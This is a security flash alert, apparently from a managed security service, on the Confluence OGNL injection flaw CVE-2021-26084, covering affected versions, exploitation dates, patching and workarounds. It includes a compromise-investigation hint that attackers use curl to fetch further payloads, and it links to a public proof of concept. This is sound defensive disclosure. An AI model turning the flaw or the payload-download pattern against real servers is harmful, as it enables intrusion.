Atlassian Confluence and the U.S. Cyber Command have issued a security advisory regarding an OGNL injection vulnerability that exists in multiple versions of the Confluence Server and Data Center products.
This Remote Code Execution (RCE) vulnerability could allow authenticated users, and in some cases, unauthenticated users to execute arbitrary code on a Confluence Server or Data Center instance. Exploits have been observed in the wild and fixes have been provided. This does not affect Confluence Cloud customers.
CVE-2021-26084 – Confluence Server Security Advisory
This vulnerability exists in on premise Confluence Server and Data center instances and can be accessed by non-administrator users or, potentially, unauthenticated users if the “Allow people to sign up to create their account” option is enabled.
To check if this function is enabled go to:
COG > User Management > User Signup Options
Before version 6.13.23
From version 6.14.0 before 7.4.11
From version 7.5.0 before 7.11.6
From version 7.12.0 before 7.12.5
Proof of Concept code has been publicly available since August 31, 2021 and active exploitation has been observed since September 2, 2021.
Atlassian Confluence recommends upgrading to latest the Long Term Support release, which can be found here. More information on these fixes can be found in the sources section at the bottom of this Flash Alert.
If it is not possible to upgrade at this time, a temporary workaround has been provided and can be found in the “Mitigation” section of the Confluence Security Advisory.
If a potential compromise has occurred, the following should be investigated:
Curl Utility – The Curl utility is often used by malicious actors to download additional payloads on compromised Linux systems.
It may also be necessary to identify any recent processes that have been launched by the Atlassian Confluence server app.
Again, Confluence Cloud customers are not affected.
If your organization possesses on premise Confluence Server and Data Center instances, we request that you provide us with the asset IP and any/all identifying information.
The Security On-Demand Threat Recon Unit will continue to monitor these events and provide relevant updates. SOD is not affected by this vulnerability.
If you have any questions about this alert, please contact your Security On-Demand Customer Success Manager.
Confluence Security Advisory – OGNL Vulnerability Security Advisory
Confluence Release Notes – Long Term Support Release Notes and Links
Confluence Server and Data Center Download – Long Term Support Download Center
CVE-2021-26084 – Atlassian Issue Tracker
MITRE CVE-2021-26084 – Confluence Server and Data Center Vulnerability
NIST CVE-2021-26084 – Confluence Server and Data Center Vulnerability
CVE-2021-26084 – Rapid7 Analysis, Triggers and Vulnerability Checks
Confluence RCE – GitHub Write-up and POC